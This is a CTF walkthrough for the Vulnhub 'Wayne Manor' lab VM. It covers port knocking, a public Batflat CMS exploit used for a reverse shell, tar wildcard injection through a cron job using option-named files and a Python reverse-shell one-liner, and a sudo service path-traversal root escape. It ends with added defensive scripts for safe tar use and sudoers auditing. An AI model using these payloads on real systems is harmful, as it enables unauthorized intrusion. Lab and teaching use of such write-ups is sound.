Vulnhub Wayne Manor: 1 Walkthrough

http://www.vulnhub.com/entry/wayne-manor-1,681/


Read GUIDELINES.txt in the unzipped files.

GUIDELINES:
    Add '<ip> waynemanor.com' to the '/etc/hosts' file.
    DHCP is ON.
Enjoy!
You can follow me on Twitter (@sec_balkan), in GitHub (@sec-balkan), or send me a message on Telegram (@sec_balkan).


Add <ip> waynemanor.com to /etc/hosts. (Important!)

Scan ports.

nmap -sV -sC -p- 192.168.33.137 -oN ports.log

Enumerate port 80 (the web server) while the full scan is still running; there is no need to wait for it to finish.

Check /blog; it contains a hint: port-knock on ports 300, 350 and 400 and FTP will open.

Knock, then scan the ports again.

knock 192.168.33.137 300 350 400

Log in to FTP as anonymous, download info.txt and read it to get the CMS credentials.

The CMS is Batflat; search for a public exploit.

Start a listener in one terminal and run the PoC in another to get a reverse shell.

nc -nlvp 1234
python3 49573.py http://waynemanor.com/ bruce alfred_help_me 192.168.33.128 1234

In /home/batman/.web/ there is a script.sh.

Running pspy64 shows that a cron job runs script.sh every minute.

It is a tar wildcard injection: the script runs tar on a shell wildcard, so file names are parsed as tar options. To escalate to user "batman", create three files in /var/www/html (the second file name contains a space, so it must be quoted):

echo '' > '--checkpoint=1'
echo '' > '--checkpoint-action=exec=sh pwn.sh'
cat <<EOF > pwn.sh
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.33.128",2234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
EOF


Then listen on port 2234 and wait for the next cron run; it returns a reverse shell as user "batman".
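The cron job is exploitable only because tar is handed a shell wildcard and then parses the resulting file names as options. The following is an added example, not code from the walkthrough or from the box: a backup function that archives a directory with tar -C on "." so that no glob is ever expanded on the command line, plus a quick check for option-like file names (the sign that such staging has happened). The scratch directory, the file names and the archive path are all constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the walkthrough or the box: archive a web root with
# tar in a way that file names cannot steer, and count the option-looking
# names that the injectable form "tar czf backup.tgz *" would parse as options.

# safe_backup DIR ARCHIVE
# Runs tar from inside DIR on "." so the shell expands no glob; every entry,
# including one named "--checkpoint=1", is stored as data, not read as a flag.
safe_backup() {
    tar cf "$2" -C "$1" .
}

# count_option_like_names DIR
# Number of top-level entries in DIR whose name starts with "-".
count_option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' | wc -l | tr -d ' '
}

# archive_has_member ARCHIVE NAME
# Succeeds when NAME, as tar stores it (e.g. "./index.html"), is in ARCHIVE.
archive_has_member() {
    tar tf "$1" | grep -Fxq "$2"
}

# Constructed scratch directory standing in for /var/www/html: one ordinary
# page plus two empty files whose names look like tar options.
DEMO_DIR=$(mktemp -d)
echo '<h1>hello</h1>' > "$DEMO_DIR/index.html"
: > "$DEMO_DIR/--checkpoint=1"
: > "$DEMO_DIR/--version"

# Archive lives outside DEMO_DIR so tar never tries to archive itself.
ARCHIVE=$(mktemp)
safe_backup "$DEMO_DIR" "$ARCHIVE"

echo "option-like names in $DEMO_DIR: $(count_option_like_names "$DEMO_DIR")"   # 2
echo "archive members:"
tar tf "$ARCHIVE"
```

The same protection is obtained with `tar cf backup.tar -- *` or by feeding tar an explicit list with `-T`; the point is that the file list must never reach tar as unescaped positional arguments from a glob. Remove `$DEMO_DIR` and `$ARCHIVE` when you are done with the demo.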

Check sudo -l.

/usr/sbin/service can be run with sudo, so use it to get a root shell.

sudo service ../../bin/sh
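This works because the sudo rule names /usr/sbin/service with no argument list, and sudoers treats a bare command path as "any arguments", so the path-traversal argument is accepted. As an added example (not from the walkthrough or the box), here is a small audit that flags such rules; the sudoers lines and user names are a constructed sample, not the box's real file.

```shell
#!/bin/sh
# Added example, not from the walkthrough or the box: flag sudoers rules that
# grant a command with no argument restriction. A bare path means "any
# arguments"; a trailing "" forbids arguments; listing the arguments pins them.

# Constructed sudoers-style sample (hypothetical users and rules).
SAMPLE_SUDOERS='# constructed sample
batman ALL=(ALL) NOPASSWD: /usr/sbin/service
deploy ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart
backup ALL=(root) NOPASSWD: /usr/bin/rsync ""
alice   ALL=(ALL) ALL'

# unrestricted_rules TEXT
# Prints each rule whose command spec is a single bare absolute path.
# Comment and blank lines are skipped; ALL is not a path and is ignored here.
# Simplification: comma-separated command lists are not split.
unrestricted_rules() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ || NF == 0 { next }
        {
            # the command spec is whatever follows the last ":" or "=" in the rule
            spec = $0
            sub(/.*[:=][[:space:]]*/, "", spec)
            # exactly one token that is an absolute path: arguments are unrestricted
            n = split(spec, tok, /[[:space:]]+/)
            if (n == 1 && tok[1] ~ /^\//) print $0
        }'
}

# count_unrestricted TEXT
# Number of rules flagged by unrestricted_rules.
count_unrestricted() {
    unrestricted_rules "$1" | wc -l | tr -d ' '
}

echo "rules allowing any arguments:"
unrestricted_rules "$SAMPLE_SUDOERS"   # the batman line only
```

The fix on the sudoers side is to write the rule the way the deploy line does, with the exact subcommand and arguments spelled out, so that an argument such as ../../bin/sh no longer matches.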
